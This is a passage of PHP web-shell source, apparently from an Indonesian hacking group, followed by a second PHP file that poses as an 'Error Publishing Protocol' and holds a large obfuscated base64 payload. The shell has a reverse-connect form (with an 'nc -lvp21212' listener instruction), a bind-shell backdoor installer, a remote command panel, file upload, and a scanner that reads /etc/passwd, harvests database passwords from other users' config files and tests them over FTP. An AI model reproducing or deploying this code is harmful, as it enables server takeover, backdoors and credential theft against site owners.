"ext_txt"=>
"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
"UpPWG3Ig6Hq/XmRjuZwkAAA7",
"ext_wri"=>
"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
"ext_xml"=>
"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
"IQA7"
);
$imgequals = array(
 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
 "ext_html"=>array("ext_html","ext_htm"),
 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
 "ext_lnk"=>array("ext_lnk","ext_url"),
 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
 "ext_doc"=>array("ext_doc","ext_dot"),
 "ext_js"=>array("ext_js","ext_vbs"),
 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
 "ext_wri"=>array("ext_wri","ext_rtf"),
 "ext_swf"=>array("ext_swf","ext_fla"),
 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
); 

if (!$getall) {
 header("Content-type: image/gif");
 header("Cache-control: public");
 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
 header("Cache-control: max-age=".(60*60*24*7));
 header("Last-Modified: ".date("r",filemtime(__FILE__)));
 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
 if (empty($images[$img])) {$img = "small_unk";}
 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
 echo base64_decode($images[$img]);
}
else {
 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
 natsort($images);
 $k = array_keys($images);
 echo "<center>";
 foreach ($k as $u) {echo $u.":<img src=\"".$surl."x=img&img=".$u."\" border=\"1\"><br>";}
 echo "</center>";
}
exit;
}

if ($x == "konak") {
 $ip = $_SERVER["REMOTE_ADDR"];
 $msg = $_POST['backcconnmsg'];
 $emsg = $_POST['backcconnmsge'];
 echo("<center><b>[&#8224;] b3k-k0n4k [&#8224;]</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=21212> Use: <select size=1 name=use><option value=Perl>PL</option></select> <input type=submit name=submit value=Connect></form>kalaian run dolo di console atw server kalaian <b>nc -lvp21212</b>, dan masukna ip sama portnya pd kedua kolom di atas. <b>baru kalian klik connectnya</b>'<br><br></center>");
 echo("$msg");
 echo("$emsg");

}

if ($x == "cP"){
	if ($_GET['go'] == 'go'){ 
  set_time_limit(0);
	##################
	@$passwd=fopen('/etc/passwd','r');
	if (!$passwd) {
	  echo "[-] Error : coudn't read /etc/passwd";
	  exit;
	}
	$path_to_public=array();
	$users=array();
	$pathtoconf=array();
	$i=0;
	
	while(!feof($passwd)) {
	 $str=fgets($passwd);
	 if ($i>35) {
		$pos=strpos($str,":");
		$username=substr($str,0,$pos);
		$dirz="/home/$username/public_html/";
		if (($username!="")) {
			if (is_readable($dirz)) {
				array_push($users,$username);
				array_push($path_to_public,$dirz);
			}
		}
	 }
	 $i++;
	}
	###################
	
	#########################
	function read_dir($path,$username) {
		if ($handle = opendir($path)) {
			while (false !== ($file = readdir($handle))) {
				 $fpath="$path$file";
				 if (($file!='.') and ($file!='..')) {
					 if (is_readable($fpath)) {
						$dr="$fpath/";
						if (is_dir($dr)) {
						  read_dir($dr,$username);
						}
						else {
							 if (($file=='config.php')
            or ($file=='configuration.php')
            or ($file=='wp-config.php')
            or ($file=='config.inc.php')
            or ($file=='database.php')
            or ($file=='conf.php')
            or ($file=='settings.php')
            or ($file=='setting.php')
						or ($file=='inc.php')
            or ($file=='corn.php')
            or ($file=='configs.php')
            or ($file=='konfig.php')
            or ($file=='dbconf.php')
            or ($file=='koneksi.php')
            or ($file=='dbconfig.php')
            or ($file=='db.inc.php')
            or ($file=='db_connect.php')
            or ($file=='dbconnect.php')
            or ($file=='db-connect.php')
            or ($file=='configure.php')
            or ($file=='global.php')
            or ($file=='connect.php')
            or ($file=='db.php')
            or ($file=='conf_db.php')
            or ($file=='database.inc.php')
            or ($file=='database.php')
            or ($file=='connection.php')
            or ($file=='connections.php')
            or ($file=='configure.class.php')
            or ($file=='config.class.php')
            or ($file=='configuration.class.php')
            or ($file=='db.class.php')
            or ($file=='file_manager.php')
            or ($file=='LocalSettings.php')
            or ($file=='filemanager.php')
            or ($file=='manager.php')
            or ($file=='managers.php')
            or ($file=='connect.inc.php')
            or ($file=='dbconnect.inc.php')) 
								 {
								$pass=get_pass($fpath);
								if ($pass!='') {
								  echo "[+] $fpath
$pass
";
								  ftp_check($username,$pass);
								}
							 }
						}
					 }
				 }
			}
		}
	}
	
	function get_pass($link) {
		@$config=fopen($link,'r');
		while(!feof($config)) {
			$line=fgets($config);
			if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'pwd') or strstr($line,'kode') or strstr($line,'mypassword') or strstr($line,'passwd')) {
				if (strrpos($line,'"'))
				  $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
				else
				  $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
				return $pass;
			}
		}
	}
	
	function ftp_check($login,$pass) {
		 @$ftp=ftp_connect('127.0.0.1');
		 if ($ftp) {
			@$res=ftp_login($ftp,$login,$pass);
			if ($res) {
			  echo '[kNa gAn] '.$login.':'.$pass." W00t
";
			}
			else ftp_quit($ftp);
		 }
	}
	
	echo "<br><br>";
	echo "<textarea name='main_window' cols=100 rows=20>";
	
	echo "[+] Found ".sizeof($users)." entrys in /etc/passwd
";
	echo "[+] Found ".sizeof($path_to_public)." readable public_html directories
";
	
	echo "[~] Searching for passwords in config.* files...

";
	foreach ($users as $user) {
			$path="/home/$user/public_html/";
			read_dir($path,$user);
	}
	
	echo "
[+] Udah
";
	
	echo "</textarea><br>";
	}else
	echo '<center>cPanel Scan<br><a href="'.$surl.'x=cP&go=go">yupz</a> || <a href="'.$surl.'">hmm</a></center>';
}

if ($x == "sleep"){
 $msg = $_POST['backcconnmsg'];
 $emsg = $_POST['backcconnmsge'];
 echo("<center><b>Bind Shell Backdoor:</b><br><br><form name=form method=POST>
 Bind Port: <input type='text' name='backconnectport' value='21212'>
 <input type='hidden' name='use' value='sleep'>
 <input type='submit' value='Install Backdoor'></form>");
 echo("$msg");
 echo("$emsg");
 echo("</center>");
}

if ($x == "sken"){
set_time_limit(0); 

($x0b = ini_get('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');

@$x0c = fopen('/etc/passwd','r');

if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }

// $x0d = array();
// $x0e = array();
// $x0f = array();
// $x10 = 0;

while(!feof($x0c)){
  // baca baris...
  // $x11 = fgets($x0c);
  // if ($x10 < 35){ 
  while($x11 = fgets($x0c)){
    
    $x12 = strpos($x11,':');

    $x13 = substr($x11,0,$x12);


    $x14 = '/home/'.$x13.'/public_html';
    if (($x13 != '')){
      
      if (is_readable($x14)){

        echo "<font face=Verdana size=2 color=#c000ff>[&#8224;] oK [&#8224;] $x14</font>";
        echo "<br/>";
      }  
    }
  }
  // $x10++;
 }
}

echo "</td></tr></table>
";
?>
<div class=barheader2><b> Command Panel </b></div>
<table class=mainpanel>
<?php
if (!$safemode) {
?>
<tr><td align=right>Command:</td>
<td><form method="POST">
  <input type=hidden name=x value="cmd">
  <input type=hidden name="d" value="<?php echo $dispd; ?>">
  <input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>">
  <input type=hidden name="cmd_txt" value="1"> - <input type=submit name=submit value="Execute">
  </form>
</td></tr>
<tr><td align=right>Quick Commands:</td>
<td><form method="POST">
  <input type=hidden name=x value="cmd">
  <input type=hidden name="d" value="<?php echo $dispd; ?>">
  <input type=hidden name="cmd_txt" value="1">
  <select name="cmd">
  <?php
  foreach ($cmdaliases as $als) {
   echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
  }
  foreach ($cmdaliases2 as $als) {
   echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";
  }
  ?>
  </select> -
  <input type=submit name=submit value="Execute">
  </form>
</td></tr>
<?php
}
?>
<tr><td align=right>Upload:</td>
<td><form method="POST" enctype="multipart/form-data">
  <input type=hidden name=x value="upload">
  <input type=hidden name="miniform" value="1">
  <input type="file" name="uploadfile"> - <input type=submit name=submit value="Upload"> <?php echo $wdt; ?>
  </form>
</td></tr>
<tr><td align=right>Make File:</td>
<td><form method="POST"><input type=hidden name=x value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
  <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="Create"> <?php echo $wdt; ?>
  </form></td></tr>
<tr><td align=right>View File:</td>
<td><form method="POST"><input type=hidden name=x value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
  <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="View">
  </form></td></tr>
</table>
<div class=barheader2 colspan=2><font color=white> FULLMAGIC COMMUNITY | Indonesia HackRs <a href="http://zone-h.org/archive/notifier=bogel" target="_blank">irc.fullmagic.us.to</a>  </font></div>
</body></html>

Did this file decode correctly?

Original Code

<?php 
/** 
 * Error Publishing Protocol 
 * 
 * @version 1.0.5-dc 
 */ 

/** 
 * 500 is handling an Error Publishing Protocol request. 
 * 
 * @var bool 
 */ 

@error_reporting(0); 
@set_time_limit(0); 


$error = '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